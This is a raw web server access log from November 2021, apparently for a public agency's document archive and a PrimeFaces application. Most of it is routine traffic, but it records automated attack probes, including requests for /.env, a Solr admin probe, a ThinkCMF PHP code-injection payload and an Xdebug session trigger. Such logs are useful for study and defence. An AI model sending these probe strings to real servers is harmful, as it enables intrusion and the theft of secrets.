104.156.229.32 - - [21/Nov/2021:01:29:56 -0500] "GET /galeria/galeria/fancybox_sprite@2x.png HTTP/1.1" 200 6553
104.156.229.32 - - [21/Nov/2021:01:29:56 -0500] "GET /galeria/galeria/fancybox_loading@2x.gif HTTP/1.1" 200 13984
190.25.39.199 - - [21/Nov/2021:01:30:43 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 12684
190.25.39.199 - - [21/Nov/2021:01:30:47 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 976272
190.25.39.199 - - [21/Nov/2021:01:31:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3978.pdf HTTP/1.1" 200 751496
190.25.39.199 - - [21/Nov/2021:01:31:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3978.pdf HTTP/1.1" 206 1
191.156.177.219 - - [21/Nov/2021:01:31:30 -0500] "POST /sipse/faces/presentacion/sistema/reporte/ventanaVerReporteParametros.xhtml HTTP/1.1" 200 50302
191.156.177.219 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.183.129 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.185.2 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.177.219 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.185.2 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.185.2 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.156.177.219 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.185.2 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.185.2 - - [21/Nov/2021:01:31:31 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.156.182.168 - - [21/Nov/2021:01:31:36 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.156.183.129 - - [21/Nov/2021:01:31:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12825
190.25.39.199 - - [21/Nov/2021:01:31:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3978.pdf HTTP/1.1" 206 1
190.25.39.199 - - [21/Nov/2021:01:31:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3978.pdf HTTP/1.1" 200 751496
191.156.183.129 - - [21/Nov/2021:01:31:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 164188
191.156.183.129 - - [21/Nov/2021:01:31:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.188.106 - - [21/Nov/2021:01:31:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.186.35 - - [21/Nov/2021:01:31:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:01:31:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:01:31:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:01:31:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:01:31:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:01:31:44 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
216.245.221.92 - - [21/Nov/2021:01:32:32 -0500] "HEAD / HTTP/1.1" 200 -
191.156.185.55 - - [21/Nov/2021:01:32:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 94142
157.55.39.31 - - [21/Nov/2021:01:33:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1449.pdf HTTP/1.1" 304 -
201.245.192.253 - - [21/Nov/2021:01:33:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45128
201.245.192.253 - - [21/Nov/2021:01:34:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44702
207.46.13.153 - - [21/Nov/2021:01:35:11 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Nov/2021:01:34:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113472
216.245.221.92 - - [21/Nov/2021:01:37:32 -0500] "HEAD / HTTP/1.1" 200 -
186.113.67.59 - - [21/Nov/2021:01:37:58 -0500] "GET /sipse/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
186.113.67.59 - - [21/Nov/2021:01:37:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:58 -0500] "GET /sipse/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12191
186.113.67.59 - - [21/Nov/2021:01:37:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:37:59 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:05 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2223
186.113.67.59 - - [21/Nov/2021:01:38:05 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:06 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16274
186.113.67.59 - - [21/Nov/2021:01:38:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:07 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:07 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:07 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.113.67.59 - - [21/Nov/2021:01:38:09 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:09 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 38970
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12870
186.113.67.59 - - [21/Nov/2021:01:38:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 161614
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.113.67.59 - - [21/Nov/2021:01:38:19 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
186.113.67.59 - - [21/Nov/2021:01:38:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 93365
157.55.39.31 - - [21/Nov/2021:01:39:46 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
157.55.39.31 - - [21/Nov/2021:01:39:49 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12505
216.245.221.92 - - [21/Nov/2021:01:42:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:01:43:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45128
201.245.192.253 - - [21/Nov/2021:01:44:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44702
201.245.192.253 - - [21/Nov/2021:01:44:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113472
216.245.221.92 - - [21/Nov/2021:01:47:32 -0500] "HEAD / HTTP/1.1" 200 -
152.61.192.232 - - [21/Nov/2021:01:52:23 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [21/Nov/2021:01:52:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [21/Nov/2021:01:52:25 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [21/Nov/2021:01:52:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:01:54:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113472
152.61.128.50 - - [21/Nov/2021:01:55:47 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [21/Nov/2021:01:55:48 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [21/Nov/2021:01:55:49 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [21/Nov/2021:01:57:32 -0500] "HEAD / HTTP/1.1" 200 -
51.11.118.103 - - [21/Nov/2021:01:58:31 -0500] "GET /.env HTTP/1.1" 404 1018
51.11.118.103 - - [21/Nov/2021:01:58:31 -0500] "POST / HTTP/1.1" 200 319
66.249.79.240 - - [21/Nov/2021:01:59:47 -0500] "-" 408 -
157.55.39.24 - - [21/Nov/2021:02:01:13 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarHistorialSolProceso.xhtml HTTP/1.1" 302 -
157.55.39.24 - - [21/Nov/2021:02:01:16 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12505
216.245.221.92 - - [21/Nov/2021:02:02:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:02:04:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
128.14.134.134 - - [21/Nov/2021:02:06:42 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:02:07:32 -0500] "HEAD / HTTP/1.1" 200 -
34.141.145.197 - - [21/Nov/2021:02:11:44 -0500] "GET / HTTP/1.1" 200 319
191.156.184.22 - - [21/Nov/2021:02:12:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 50269
191.156.184.22 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
191.156.183.33 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
191.156.183.129 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.184.22 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.183.33 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
191.156.183.33 - - [21/Nov/2021:02:12:25 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
191.156.183.33 - - [21/Nov/2021:02:12:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.183.33 - - [21/Nov/2021:02:12:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.183.33 - - [21/Nov/2021:02:12:26 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
191.156.184.22 - - [21/Nov/2021:02:12:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.22 - - [21/Nov/2021:02:12:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.184.22 - - [21/Nov/2021:02:12:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 43663
191.156.184.22 - - [21/Nov/2021:02:12:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 43663
216.245.221.92 - - [21/Nov/2021:02:12:32 -0500] "HEAD / HTTP/1.1" 200 -
191.156.185.55 - - [21/Nov/2021:02:12:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12960
191.156.191.147 - - [21/Nov/2021:02:12:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 168052
191.156.191.147 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.176.174 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.176.174 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.191.147 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.176.174 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.176.174 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.176.174 - - [21/Nov/2021:02:12:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.176.174 - - [21/Nov/2021:02:12:44 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
191.156.176.174 - - [21/Nov/2021:02:13:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 93261
201.245.192.253 - - [21/Nov/2021:02:14:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113858
216.245.221.92 - - [21/Nov/2021:02:17:32 -0500] "HEAD / HTTP/1.1" 200 -
45.146.164.110 - - [21/Nov/2021:02:18:30 -0500] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 1018
216.245.221.92 - - [21/Nov/2021:02:22:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:02:23:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45149
201.245.192.253 - - [21/Nov/2021:02:23:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44845
201.245.192.253 - - [21/Nov/2021:02:24:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113858
216.245.221.92 - - [21/Nov/2021:02:27:32 -0500] "HEAD / HTTP/1.1" 200 -
186.84.21.144 - - [21/Nov/2021:02:31:56 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [21/Nov/2021:02:32:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:02:33:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45149
20.36.244.102 - - [21/Nov/2021:02:33:52 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
201.245.192.253 - - [21/Nov/2021:02:34:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44845
186.146.123.43 - - [21/Nov/2021:02:34:56 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.144.125 - - [21/Nov/2021:02:34:59 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Nov/2021:02:34:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113858
216.245.221.92 - - [21/Nov/2021:02:37:32 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Nov/2021:02:42:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.238 - - [21/Nov/2021:02:43:37 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:02:43:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45149
201.245.192.253 - - [21/Nov/2021:02:43:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44845
201.245.192.253 - - [21/Nov/2021:02:44:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113858
216.245.221.92 - - [21/Nov/2021:02:47:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.238 - - [21/Nov/2021:02:49:58 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:02:52:32 -0500] "HEAD / HTTP/1.1" 200 -
190.126.144.47 - - [21/Nov/2021:02:52:45 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.131.233.224 - - [21/Nov/2021:02:53:27 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Nov/2021:02:54:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113858
216.245.221.92 - - [21/Nov/2021:02:57:32 -0500] "HEAD / HTTP/1.1" 200 -
45.146.164.110 - - [21/Nov/2021:02:58:28 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:03:02:32 -0500] "HEAD / HTTP/1.1" 200 -
20.75.128.100 - - [21/Nov/2021:03:03:51 -0500] "GET /galeria/galeria/fancybox_sprite@2x.png HTTP/1.1" 200 6553
201.245.192.253 - - [21/Nov/2021:03:04:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [21/Nov/2021:03:07:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.240 - - [21/Nov/2021:03:08:44 -0500] "-" 408 -
35.204.134.129 - - [21/Nov/2021:03:10:49 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:03:12:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:03:14:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113867
216.245.221.92 - - [21/Nov/2021:03:17:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:03:17:37 -0500] "-" 408 -
157.55.39.31 - - [21/Nov/2021:03:19:54 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [21/Nov/2021:03:22:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:03:23:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44970
66.249.79.236 - - [21/Nov/2021:03:24:03 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:03:23:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44854
157.55.39.214 - - [21/Nov/2021:03:25:08 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12505
201.245.192.253 - - [21/Nov/2021:03:24:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113867
216.245.221.92 - - [21/Nov/2021:03:27:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:03:30:41 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:03:32:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:03:33:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44970
201.245.192.253 - - [21/Nov/2021:03:34:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44854
66.249.79.32 - - [21/Nov/2021:03:35:15 -0500] "-" 408 -
201.245.192.253 - - [21/Nov/2021:03:34:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113867
66.249.79.236 - - [21/Nov/2021:03:37:26 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:03:37:32 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Nov/2021:03:42:32 -0500] "HEAD / HTTP/1.1" 200 -
66.249.79.236 - - [21/Nov/2021:03:43:52 -0500] "-" 408 -
45.146.164.110 - - [21/Nov/2021:03:43:52 -0500] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 319
201.245.192.253 - - [21/Nov/2021:03:43:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44970
201.245.192.253 - - [21/Nov/2021:03:44:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44854
201.245.192.253 - - [21/Nov/2021:03:44:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113867
216.245.221.92 - - [21/Nov/2021:03:47:32 -0500] "HEAD / HTTP/1.1" 200 -
92.118.160.9 - - [21/Nov/2021:03:49:39 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.236 - - [21/Nov/2021:03:50:02 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:03:52:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:03:54:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113867
66.249.79.236 - - [21/Nov/2021:03:56:18 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:03:57:32 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.14 - - [21/Nov/2021:03:57:42 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 178896
66.249.79.236 - - [21/Nov/2021:04:02:15 -0500] "-" 408 -
216.245.221.92 - - [21/Nov/2021:04:02:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:04:04:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [21/Nov/2021:04:07:32 -0500] "HEAD / HTTP/1.1" 200 -
34.91.27.14 - - [21/Nov/2021:04:09:20 -0500] "GET / HTTP/1.1" 200 319
66.249.79.236 - - [21/Nov/2021:04:09:25 -0500] "-" 408 -
45.146.164.110 - - [21/Nov/2021:04:10:45 -0500] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 319
216.245.221.92 - - [21/Nov/2021:04:12:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Nov/2021:04:14:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 113878
